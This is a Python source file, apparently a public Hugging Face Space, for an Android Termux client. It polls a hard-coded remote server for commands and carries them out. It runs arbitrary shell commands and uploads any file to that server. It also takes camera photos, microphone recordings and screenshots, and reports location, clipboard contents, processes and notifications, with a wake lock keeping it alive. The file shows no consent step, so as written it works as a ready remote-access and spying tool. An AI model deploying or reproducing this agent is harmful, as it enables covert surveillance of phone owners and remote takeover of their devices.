Spaces:
Sleeping
Sleeping
| import requests | |
| import time | |
| import subprocess | |
| import os | |
| import json | |
| import shutil | |
| SERVER_URL = "https://aleksmorshen-contrem.hf.space" | |
| TERMUX_API_PATH = "/data/data/com.termux/files/usr/bin/" | |
| CLIENT_TEMP_DIR = "/data/data/com.termux/files/home/client_temp_files" | |
| current_path = "~" | |
| RETRY_DELAY_SECONDS = 15 # Задержка между попытками переподключения | |
| def ensure_client_temp_dir(): | |
| if not os.path.exists(CLIENT_TEMP_DIR): | |
| os.makedirs(CLIENT_TEMP_DIR, exist_ok=True) | |
| def get_absolute_path(path_to_resolve, base_path): | |
| expanded_base_path = os.path.expanduser(base_path) if base_path == "~" else base_path | |
| if os.path.isabs(path_to_resolve): | |
| abs_path = os.path.normpath(path_to_resolve) | |
| else: | |
| abs_path = os.path.normpath(os.path.join(expanded_base_path, path_to_resolve)) | |
| home_dir_abs = os.path.expanduser("~") | |
| if abs_path == home_dir_abs: | |
| return "~" | |
| return abs_path | |
| def execute_shell_command(command_str, work_dir_param): | |
| global current_path | |
| resolved_work_dir = os.path.expanduser(work_dir_param) if work_dir_param == "~" else work_dir_param | |
| try: | |
| if command_str.strip().startswith("cd "): | |
| new_dir_candidate = command_str.strip()[3:].strip() | |
| if not new_dir_candidate: new_dir_candidate = "~" | |
| target_dir_resolved_for_os = get_absolute_path(new_dir_candidate, resolved_work_dir) | |
| if new_dir_candidate == "~" or target_dir_resolved_for_os == os.path.expanduser("~"): | |
| target_display_path = "~" | |
| actual_os_path_for_check = os.path.expanduser("~") | |
| else: | |
| target_display_path = target_dir_resolved_for_os | |
| actual_os_path_for_check = target_dir_resolved_for_os | |
| if os.path.isdir(actual_os_path_for_check): | |
| current_path = target_display_path | |
| return f"Директория изменена на: {current_path}" | |
| else: | |
| return f"Ошибка: Директория не найдена или не является директорией: {actual_os_path_for_check} (из {new_dir_candidate})" | |
| result = subprocess.run(command_str, shell=True, capture_output=True, text=True, cwd=resolved_work_dir, timeout=30) | |
| output = result.stdout if result.stdout else "" | |
| if result.stderr: | |
| output += f"\nОшибки:\n{result.stderr}" | |
| return output if output else "Команда выполнена, нет вывода." | |
| except subprocess.TimeoutExpired: | |
| return "Ошибка: Команда выполнялась слишком долго (таймаут)." | |
| except Exception as e: | |
| return f"Исключение при выполнении команды: {str(e)}" | |
| def termux_api_command(api_args_list, parse_json=False): | |
| try: | |
| base_command = [os.path.join(TERMUX_API_PATH, api_args_list[0])] | |
| full_command = base_command + api_args_list[1:] | |
| process = subprocess.Popen(full_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, encoding='utf-8', errors='replace') | |
| stdout_res, stderr_res = process.communicate(timeout=90) | |
| stdout_res = stdout_res.strip() if stdout_res else "" | |
| stderr_res = stderr_res.strip() if stderr_res else "" | |
| if process.returncode == 0: | |
| if parse_json: | |
| try: | |
| if not stdout_res: return {"success": True, "message": f"{api_args_list[0]} выполнена, нет JSON вывода."} | |
| return json.loads(stdout_res) | |
| except json.JSONDecodeError: | |
| return {"error": "Failed to parse JSON from API", "raw_output": stdout_res} | |
| return stdout_res if stdout_res else f"{api_args_list[0]} выполнена." | |
| else: | |
| error_msg_dict = {"error": f"Ошибка Termux API ({api_args_list[0]})"} | |
| if stderr_res: error_msg_dict["details"] = stderr_res | |
| elif stdout_res: error_msg_dict["details"] = stdout_res | |
| else: error_msg_dict["details"] = "Неизвестная ошибка." | |
| return error_msg_dict if parse_json else f"{error_msg_dict['error']}: {error_msg_dict.get('details', '')}" | |
| except subprocess.TimeoutExpired: | |
| return {"error": f"Ошибка: {api_args_list[0]} выполнялась слишком долго."} if parse_json else f"Ошибка: {api_args_list[0]} выполнялась слишком долго." | |
| except FileNotFoundError: | |
| return {"error": f"Ошибка: {api_args_list[0]} не найден."} if parse_json else f"Ошибка: {api_args_list[0]} не найден." | |
| except Exception as e: | |
| return {"error": f"Исключение при Termux API: {str(e)}"} if parse_json else f"Исключение при Termux API: {str(e)}" | |
| def list_files_detailed(path_to_list_param): | |
| global current_path | |
| path_for_os_calls = "" | |
| new_current_path_display = "" | |
| if path_to_list_param == "..": | |
| base_for_parent = os.path.expanduser(current_path) if current_path == "~" else current_path | |
| path_for_os_calls = os.path.normpath(os.path.join(base_for_parent, "..")) | |
| else: | |
| path_for_os_calls = get_absolute_path(path_to_list_param, current_path) | |
| if path_for_os_calls == "~": | |
| path_for_os_calls = os.path.expanduser("~") | |
| if path_for_os_calls == os.path.expanduser("~"): | |
| new_current_path_display = "~" | |
| else: | |
| new_current_path_display = path_for_os_calls | |
| if not os.path.exists(path_for_os_calls): | |
| return f"Ошибка: Путь '{path_for_os_calls}' не существует." | |
| if not os.path.isdir(path_for_os_calls): | |
| return f"Ошибка: '{path_for_os_calls}' не является директорией." | |
| current_path = new_current_path_display | |
| try: | |
| items = os.listdir(path_for_os_calls) | |
| output_str = f"Содержимое '{current_path}':\n" | |
| dirs = [] | |
| files = [] | |
| for item_name in items: | |
| item_full_path = os.path.join(path_for_os_calls, item_name) | |
| if os.path.isdir(item_full_path): | |
| dirs.append(f"[D] {item_name}") | |
| else: | |
| files.append(f"[F] {item_name}") | |
| for d_item in sorted(dirs): | |
| output_str += d_item + "\n" | |
| for f_item in sorted(files): | |
| output_str += f_item + "\n" | |
| return output_str.strip() | |
| except PermissionError: | |
| return f"Ошибка: Нет прав доступа к '{path_for_os_calls}'." | |
| except Exception as e: | |
| return f"Ошибка листинга файлов: {str(e)}" | |
| def client_uploads_file_to_server(filename_param, origin_command_type="unknown"): | |
| global current_path | |
| if os.path.isabs(filename_param): | |
| filepath_on_client_abs = filename_param | |
| else: | |
| base_dir_for_resolve = os.path.expanduser(current_path) if current_path == "~" else current_path | |
| filepath_on_client_abs = os.path.normpath(os.path.join(base_dir_for_resolve, filename_param)) | |
| if not os.path.exists(filepath_on_client_abs) or not os.path.isfile(filepath_on_client_abs): | |
| return f"Ошибка: Файл '{filepath_on_client_abs}' не найден или не является файлом для загрузки на сервер." | |
| try: | |
| with open(filepath_on_client_abs, 'rb') as f: | |
| files_payload = {'file': (os.path.basename(filepath_on_client_abs), f)} | |
| data_payload = {'origin_command_type': origin_command_type} | |
| response = requests.post(f"{SERVER_URL}/upload_from_client", files=files_payload, data=data_payload, timeout=180) | |
| response.raise_for_status() | |
| return f"Файл '{os.path.basename(filepath_on_client_abs)}' отправлен на сервер. Ответ: {response.text}" | |
| except requests.exceptions.RequestException as e: | |
| return f"Сетевая ошибка при загрузке файла на сервер: {str(e)}" | |
| except Exception as e: | |
| return f"Ошибка при отправке файла на сервер: {str(e)}" | |
| def take_photo_client(camera_id='0'): | |
| ensure_client_temp_dir() | |
| temp_photo_name = "temp_photo.jpg" | |
| photo_path_abs = os.path.join(CLIENT_TEMP_DIR, temp_photo_name) | |
| if os.path.exists(photo_path_abs): os.remove(photo_path_abs) | |
| api_result = termux_api_command(['termux-camera-photo', '-c', camera_id, photo_path_abs]) | |
| if os.path.exists(photo_path_abs) and os.path.getsize(photo_path_abs) > 0 : | |
| upload_status = client_uploads_file_to_server(photo_path_abs, origin_command_type="take_photo") | |
| try: os.remove(photo_path_abs) | |
| except: pass | |
| return f"Фото сделано (камера {camera_id}). API: '{api_result}'.\nЗагрузка: {upload_status}" | |
| else: | |
| err_msg = f"Не удалось сделать фото. API: '{api_result}'." | |
| if os.path.exists(photo_path_abs): | |
| err_msg += " Файл создан, но пуст." | |
| try: os.remove(photo_path_abs) | |
| except: pass | |
| else: | |
| err_msg += " Файл не создан." | |
| return err_msg | |
| def record_audio_client(duration_sec='5'): | |
| ensure_client_temp_dir() | |
| temp_audio_name = "temp_audio.mp3" | |
| audio_path_abs = os.path.join(CLIENT_TEMP_DIR, temp_audio_name) | |
| if os.path.exists(audio_path_abs): os.remove(audio_path_abs) | |
| limit = str(max(1, int(duration_sec))) | |
| api_result = termux_api_command(['termux-microphone-record', '-f', audio_path_abs, '-l', limit]) | |
| time.sleep(int(limit) + 2) | |
| if os.path.exists(audio_path_abs) and os.path.getsize(audio_path_abs) > 0: | |
| upload_status = client_uploads_file_to_server(audio_path_abs, origin_command_type="record_audio") | |
| try: os.remove(audio_path_abs) | |
| except: pass | |
| return f"Аудио ({limit} сек) записано. API: '{api_result}'.\nЗагрузка: {upload_status}" | |
| else: | |
| err_msg = f"Не удалось записать аудио. API: '{api_result}'." | |
| if os.path.exists(audio_path_abs): | |
| err_msg += " Файл создан, но пуст." | |
| try: os.remove(audio_path_abs) | |
| except: pass | |
| else: | |
| err_msg += " Файл не создан." | |
| return err_msg | |
| def take_screenshot_client(): | |
| ensure_client_temp_dir() | |
| screenshot_filename_base = f"screenshot_{int(time.time())}.png" | |
| screenshot_path_abs = os.path.join(CLIENT_TEMP_DIR, screenshot_filename_base) | |
| if os.path.exists(screenshot_path_abs): | |
| os.remove(screenshot_path_abs) | |
| api_result_raw = termux_api_command(['termux-screenshot', screenshot_path_abs]) | |
| api_success_message = f"Команда termux-screenshot выполнена (статус: {api_result_raw if api_result_raw else 'успешно, нет вывода'})." | |
| time.sleep(1.5) | |
| if os.path.exists(screenshot_path_abs) and os.path.getsize(screenshot_path_abs) > 100: | |
| upload_status = client_uploads_file_to_server(screenshot_path_abs, origin_command_type="screenshot") | |
| try: os.remove(screenshot_path_abs) | |
| except: pass | |
| return f"Скриншот сделан. {api_success_message}\nЗагрузка: {upload_status}" | |
| else: | |
| err_msg = f"Не удалось сделать скриншот или файл пуст. {api_success_message}." | |
| if os.path.exists(screenshot_path_abs): | |
| err_msg += f" Файл '{screenshot_filename_base}' существует, но его размер {os.path.getsize(screenshot_path_abs)} байт." | |
| else: | |
| err_msg += f" Файл '{screenshot_filename_base}' не создан." | |
| return err_msg | |
| def receive_file_from_server(download_url, target_path_on_device_str, original_filename): | |
| global current_path | |
| try: | |
| if target_path_on_device_str.startswith("~/"): | |
| base_dir = os.path.expanduser("~") | |
| path_suffix = target_path_on_device_str[2:] | |
| resolved_target_base = os.path.join(base_dir, path_suffix) | |
| elif os.path.isabs(target_path_on_device_str): | |
| resolved_target_base = target_path_on_device_str | |
| else: | |
| current_expanded = os.path.expanduser(current_path) if current_path == "~" else current_path | |
| resolved_target_base = os.path.join(current_expanded, target_path_on_device_str) | |
| resolved_target_base = os.path.normpath(resolved_target_base) | |
| final_save_path = "" | |
| if target_path_on_device_str.endswith(os.sep) or os.path.isdir(resolved_target_base): | |
| os.makedirs(resolved_target_base, exist_ok=True) | |
| final_save_path = os.path.join(resolved_target_base, original_filename) | |
| else: | |
| parent_dir_of_target = os.path.dirname(resolved_target_base) | |
| os.makedirs(parent_dir_of_target, exist_ok=True) | |
| final_save_path = resolved_target_base | |
| response = requests.get(download_url, stream=True, timeout=180) | |
| response.raise_for_status() | |
| with open(final_save_path, 'wb') as f: | |
| for chunk in response.iter_content(chunk_size=8192): | |
| f.write(chunk) | |
| return f"Файл '{original_filename}' успешно сохранен в '{final_save_path}'." | |
| except requests.exceptions.RequestException as e: | |
| return f"Сетевая ошибка при скачивании файла с сервера: {str(e)}" | |
| except IOError as e: | |
| return f"Ошибка записи файла '{original_filename}' в '{final_save_path if 'final_save_path' in locals() else target_path_on_device_str}': {str(e)}" | |
| except Exception as e: | |
| return f"Общая ошибка при получении файла '{original_filename}': {str(e)}" | |
| def get_clipboard_client(): | |
| return termux_api_command(['termux-clipboard-get']) | |
| def set_clipboard_client(text_to_set): | |
| try: | |
| process = subprocess.Popen([os.path.join(TERMUX_API_PATH, 'termux-clipboard-set')], stdin=subprocess.PIPE, text=True, encoding='utf-8', errors='replace') | |
| process.communicate(input=text_to_set, timeout=10) | |
| if process.returncode == 0: | |
| return "Текст установлен в буфер обмена." | |
| else: | |
| return "Ошибка установки текста в буфер обмена." | |
| except subprocess.TimeoutExpired: | |
| return "Таймаут при установке текста в буфер обмена." | |
| except Exception as e: | |
| return f"Ошибка API буфера обмена: {str(e)}" | |
| def open_url_client(url_to_open): | |
| if not url_to_open.startswith(('http://', 'https://')): | |
| url_to_open = 'http://' + url_to_open | |
| return termux_api_command(['termux-open-url', url_to_open]) | |
| def get_device_status_client(item_to_get=None): | |
| status_update = {} | |
| general_output_messages = [] | |
| if item_to_get is None or item_to_get == 'battery': | |
| battery_data = termux_api_command(['termux-battery-status'], parse_json=True) | |
| if isinstance(battery_data, dict) and 'error' not in battery_data: | |
| status_update['battery'] = battery_data | |
| else: | |
| error_detail = battery_data.get("error", "Unknown battery error") if isinstance(battery_data, dict) else str(battery_data) | |
| status_update['battery'] = {"error": error_detail} | |
| general_output_messages.append(f"Батарея: {error_detail}") | |
| if item_to_get is None or item_to_get == 'location': | |
| location_data = termux_api_command(['termux-location', '-p', 'network', '-r', 'once'], parse_json=True) | |
| if isinstance(location_data, dict) and 'error' not in location_data: | |
| status_update['location'] = location_data | |
| else: | |
| error_detail = location_data.get("error", "Unknown location error") if isinstance(location_data, dict) else str(location_data) | |
| status_update['location'] = {"error": error_detail} | |
| general_output_messages.append(f"Локация: {error_detail}") | |
| if item_to_get is None or item_to_get == 'processes': | |
| try: | |
| result = subprocess.run("ps ux", shell=True, capture_output=True, text=True, timeout=10, encoding='utf-8', errors='replace') | |
| if result.returncode == 0: | |
| status_update['processes'] = result.stdout | |
| else: | |
| status_update['processes'] = f"Ошибка получения процессов: {result.stderr}" | |
| general_output_messages.append(status_update['processes']) | |
| except Exception as e: | |
| status_update['processes'] = f"Исключение при получении процессов: {str(e)}" | |
| general_output_messages.append(status_update['processes']) | |
| output_msg = "Статус устройства обновлен." | |
| if general_output_messages: | |
| output_msg += "\nПроблемы:\n" + "\n".join(general_output_messages) | |
| return status_update, output_msg | |
| def get_notifications_client(): | |
| notifications_data = termux_api_command(['termux-notification-list'], parse_json=True) | |
| if isinstance(notifications_data, list): | |
| return notifications_data, "Список уведомлений получен." | |
| elif isinstance(notifications_data, dict) and 'error' in notifications_data: | |
| return [], f"Ошибка получения уведомлений: {notifications_data.get('details', notifications_data['error'])}" | |
| else: | |
| return [], f"Неожиданный ответ от API уведомлений: {str(notifications_data)}" | |
| def main_loop(): | |
| global current_path, last_heartbeat_time # last_heartbeat_time should be global if used across reconnections | |
| last_heartbeat_time = 0 | |
| post_data = {} | |
| while True: | |
| post_data.clear() | |
| post_data['current_path'] = current_path | |
| try: | |
| if time.time() - last_heartbeat_time > 20: | |
| post_data['heartbeat'] = True | |
| battery_info, _ = get_device_status_client(item_to_get='battery') | |
| if battery_info: | |
| post_data['device_status_update'] = battery_info | |
| response = requests.get(f"{SERVER_URL}/get_command", timeout=15) | |
| response.raise_for_status() # Will raise HTTPError for bad responses (4xx or 5xx) | |
| # If we reach here, connection is successful | |
| if 'print_once_connected' in globals() and print_once_connected: | |
| print("Успешное подключение к серверу.") | |
| del globals()['print_once_connected'] # Print only once after successful connection | |
| command_data = response.json() | |
| output_for_server = None | |
| if command_data: | |
| cmd_type = command_data.get('type') | |
| if cmd_type == 'shell': | |
| output_for_server = execute_shell_command(command_data['command'], current_path) | |
| elif cmd_type == 'list_files': | |
| output_for_server = list_files_detailed(command_data['path']) | |
| elif cmd_type == 'upload_to_server': | |
| output_for_server = client_uploads_file_to_server(command_data['filename'], origin_command_type=cmd_type) | |
| elif cmd_type == 'take_photo': | |
| output_for_server = take_photo_client(command_data.get('camera_id', '0')) | |
| elif cmd_type == 'record_audio': | |
| output_for_server = record_audio_client(command_data.get('duration', '5')) | |
| elif cmd_type == 'screenshot': | |
| output_for_server = take_screenshot_client() | |
| elif cmd_type == 'receive_file': | |
| output_for_server = receive_file_from_server( | |
| command_data['download_url'], | |
| command_data['target_path'], | |
| command_data['original_filename'] | |
| ) | |
| elif cmd_type == 'clipboard_get': | |
| output_for_server = get_clipboard_client() | |
| elif cmd_type == 'clipboard_set': | |
| output_for_server = set_clipboard_client(command_data['text']) | |
| elif cmd_type == 'open_url': | |
| output_for_server = open_url_client(command_data['url']) | |
| elif cmd_type == 'get_device_status': | |
| status_payload, status_output_msg = get_device_status_client(command_data.get('item')) | |
| post_data['device_status_update'] = status_payload | |
| output_for_server = status_output_msg | |
| elif cmd_type == 'get_notifications': | |
| notifications_list, notifications_msg = get_notifications_client() | |
| post_data['notifications_update'] = notifications_list | |
| output_for_server = notifications_msg | |
| else: | |
| output_for_server = "Неизвестный тип команды получен клиентом." | |
| if output_for_server: | |
| post_data['output'] = str(output_for_server) | |
| if post_data: | |
| requests.post(f"{SERVER_URL}/submit_client_data", json=post_data, timeout=25) | |
| if post_data.get('heartbeat'): | |
| last_heartbeat_time = time.time() | |
| except requests.exceptions.RequestException as e: | |
| print(f"Ошибка сети или сервера: {e}. Повторная попытка через {RETRY_DELAY_SECONDS} секунд...") | |
| globals()['print_once_connected'] = True # Set flag to print upon next successful connection | |
| time.sleep(RETRY_DELAY_SECONDS) | |
| continue # Restart the loop for a new connection attempt | |
| except Exception as e: | |
| print(f"Общая ошибка в цикле клиента: {e}") | |
| error_payload = {'output': f"Критическая ошибка на клиенте: {str(e)}", 'current_path': current_path} | |
| try: | |
| requests.post(f"{SERVER_URL}/submit_client_data", json=error_payload, timeout=10) | |
| except: | |
| pass # If sending error fails, just log locally and retry connection | |
| print(f"Повторная попытка подключения через {RETRY_DELAY_SECONDS} секунд...") | |
| globals()['print_once_connected'] = True | |
| time.sleep(RETRY_DELAY_SECONDS) | |
| continue | |
| time.sleep(2.5) | |
| if __name__ == '__main__': | |
| current_path = "~" | |
| if not os.path.isdir(os.path.expanduser(current_path)): | |
| current_path = "/data/data/com.termux/files/home" | |
| if not os.path.isdir(current_path): | |
| current_path = "." | |
| ensure_client_temp_dir() | |
| print(f"Клиент запущен. Попытка подключения к серверу: {SERVER_URL}") | |
| try: | |
| termux_api_command(['termux-wake-lock']) | |
| except Exception as e: | |
| print(f"Предупреждение: Не удалось установить termux-wake-lock: {e}") | |
| # This global flag helps print "connected" message only once after a series of failed attempts | |
| globals()['print_once_connected'] = True | |
| try: | |
| main_loop() # Start the main operational loop with reconnection logic | |
| except KeyboardInterrupt: | |
| print("Клиент остановлен вручную.") | |
| finally: | |
| try: | |
| termux_api_command(['termux-wake-unlock']) | |
| except Exception as e: | |
| print(f"Предупреждение: Не удалось снять termux-wake-unlock: {e}") | |
| print("Завершение работы клиента.") |